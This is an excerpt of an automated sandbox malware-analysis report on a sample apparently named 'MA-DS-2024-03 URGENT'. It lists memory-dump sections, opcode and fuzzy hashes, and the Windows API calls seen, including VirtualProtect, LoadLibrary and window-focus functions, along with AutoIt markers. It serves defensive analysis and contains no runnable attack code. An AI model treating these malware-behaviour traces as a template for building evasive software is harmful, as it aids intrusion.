                                                        • Instruction Fuzzy Hash: F971D42180CB808EF737872CCD18675BF716B52264F4D8ADAD2978B3A3D3798445CB92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f99b2fa1f82a18a8585a21b319ce60e29218eb5c4cc1421af370e0158a5572f3
                                                        • Instruction ID: 2d49773f75dd6c9e76722b9e08c524f4cf74b12b855309a226cff4a1f54d4b31
                                                        • Opcode Fuzzy Hash: f99b2fa1f82a18a8585a21b319ce60e29218eb5c4cc1421af370e0158a5572f3
                                                        • Instruction Fuzzy Hash: 7D619B706002069FDB20DF60C881AABB7E5EF44314F14847EED06A7782D779ED59CB59
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f11e64fe7881dd54875cb938b1da74a75137d71ef6380f15b6d317cce4d22b25
                                                        • Instruction ID: 6b63161941b3488df7078e909ce163a2a1fa0d71039c57995929c397e8c210d0
                                                        • Opcode Fuzzy Hash: f11e64fe7881dd54875cb938b1da74a75137d71ef6380f15b6d317cce4d22b25
                                                        • Instruction Fuzzy Hash: 4C51D234700604AFDF14EF65C981EAE77A6AF45318F15816EF906AB382DA38ED01CB49
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 030085fe395fb9b2d690e5a5924655657a28692294b1633d152d7f012e7e651b
                                                        • Instruction ID: f2aaf07d39dc7a550ad12c14ff96cfe6c5e116dc3aa3fcd7f3dd41a333c9bf6c
                                                        • Opcode Fuzzy Hash: 030085fe395fb9b2d690e5a5924655657a28692294b1633d152d7f012e7e651b
                                                        • Instruction Fuzzy Hash: 1331C96190DB408EFB378B6CCD483397EB16B81664F48C59AD2968A3A7D7798009CB52
                                                        APIs
                                                        • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00405B96
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                                                        • Instruction ID: 1b656b166a304b9d337e3dd4d9fe6df5e0790be29ec59920d2bb6ad29cb972c8
                                                        • Opcode Fuzzy Hash: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                                                        • Instruction Fuzzy Hash: F0315C31A00A09AFDB18DF6DC480A6EB7B5FF48310F14866AD815A3754D774B990CF95
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 97021d4f32bf3e563f1c3d98945ec58ba0baed1b1e7fd12fc4625a598daddbb7
                                                        • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                                        • Opcode Fuzzy Hash: 97021d4f32bf3e563f1c3d98945ec58ba0baed1b1e7fd12fc4625a598daddbb7
                                                        • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 158370926a79d7dcef4898dd312af6e718ea50f97a9e72c022e6d213e21be2ee
                                                        • Instruction ID: 5aee7fa9bcd607eba38c972a5a3afb297840d704fa760c95cbb8f93a96c2956d
                                                        • Opcode Fuzzy Hash: 158370926a79d7dcef4898dd312af6e718ea50f97a9e72c022e6d213e21be2ee
                                                        • Instruction Fuzzy Hash: 2821D471910A08EBCB009F52F84076A7BB8FB09310F21957BE485D5151DB7494D0D74E
                                                        APIs
                                                          • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                                          • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                          • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                                          • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                        • String ID:
                                                        • API String ID: 1396898556-0
                                                        • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                        • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                                        • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                        • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 6131b91a2293182e5e803a8fd7e0457fbee9f472f48ec417c52c5e1864e76581
                                                        • Instruction ID: 95ef85ecf4a985c53e38b6b1237abcb75d3ed32973377874be14757091495c4e
                                                        • Opcode Fuzzy Hash: 6131b91a2293182e5e803a8fd7e0457fbee9f472f48ec417c52c5e1864e76581
                                                        • Instruction Fuzzy Hash: 2B112C756046029FC724DF29D541916B7E9EF49314B20882EE48ACB362DB36E841CB55
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: d91c9a0b3bf6359c916e12f661e99ff5d5878bbf1d500bec4267ef2357e72d6d
                                                        • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                                        • Opcode Fuzzy Hash: d91c9a0b3bf6359c916e12f661e99ff5d5878bbf1d500bec4267ef2357e72d6d
                                                        • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                                        APIs
                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,00000000,?,00010000,?,004056A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00405C16
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        APIs
                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                        • _memset.LIBCMT ref: 004676F9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw_memsetstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 525207782-0
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 004248A6
                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2597487223-0
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        APIs
                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath_memmove
                                                        • String ID:
                                                        • API String ID: 2514874351-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock
                                                        • String ID:
                                                        • API String ID: 2638373210-0
                                                        APIs
                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,0043DD42,?,?,00000000), ref: 00405C5F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00441DF0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: PathTemp
                                                        • String ID:
                                                        • API String ID: 2920410445-0
                                                        APIs
                                                        • GetLastError.KERNEL32(00000002,00000000), ref: 0046D1FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID:
                                                        • API String ID: 1452528299-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                                        • SendMessageW.USER32 ref: 0048CC29
                                                        • _wcsncpy.LIBCMT ref: 0048CC95
                                                        • GetKeyState.USER32(00000011), ref: 0048CCB6
                                                        • GetKeyState.USER32(00000009), ref: 0048CCC3
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                                        • GetKeyState.USER32(00000010), ref: 0048CCE3
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                                        • SendMessageW.USER32 ref: 0048CD33
                                                        • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                                        • SetCapture.USER32(?), ref: 0048CE69
                                                        • ClientToScreen.USER32(?,?), ref: 0048CECE
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                                        • ReleaseCapture.USER32 ref: 0048CF00
                                                        • GetCursorPos.USER32(?), ref: 0048CF3A
                                                        • ScreenToClient.USER32(?,?), ref: 0048CF47
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                                        • SendMessageW.USER32 ref: 0048CFD1
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                                        • SendMessageW.USER32 ref: 0048D03D
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                                        • GetCursorPos.USER32(?), ref: 0048D08D
                                                        • ScreenToClient.USER32(?,?), ref: 0048D09A
                                                        • GetParent.USER32(?), ref: 0048D0BA
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                                        • SendMessageW.USER32 ref: 0048D154
                                                        • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                                        • SendMessageW.USER32 ref: 0048D22F
                                                        • ClientToScreen.USER32(?,?), ref: 0048D281
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                                          • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                        • String ID: @GUI_DRAGID$F$pbL
                                                        • API String ID: 3977979337-2097280626
                                                        • Opcode ID: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
                                                        • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                                                        • Opcode Fuzzy Hash: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
                                                        • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_memset
                                                        • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                                        • API String ID: 1357608183-1426331590
                                                        • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                        • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                                                        • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                        • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                                        • IsIconic.USER32(?), ref: 0043D66E
                                                        • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                                        • SetForegroundWindow.USER32(?), ref: 0043D685
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                                        • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                                        • SetForegroundWindow.USER32(?), ref: 0043D6D2
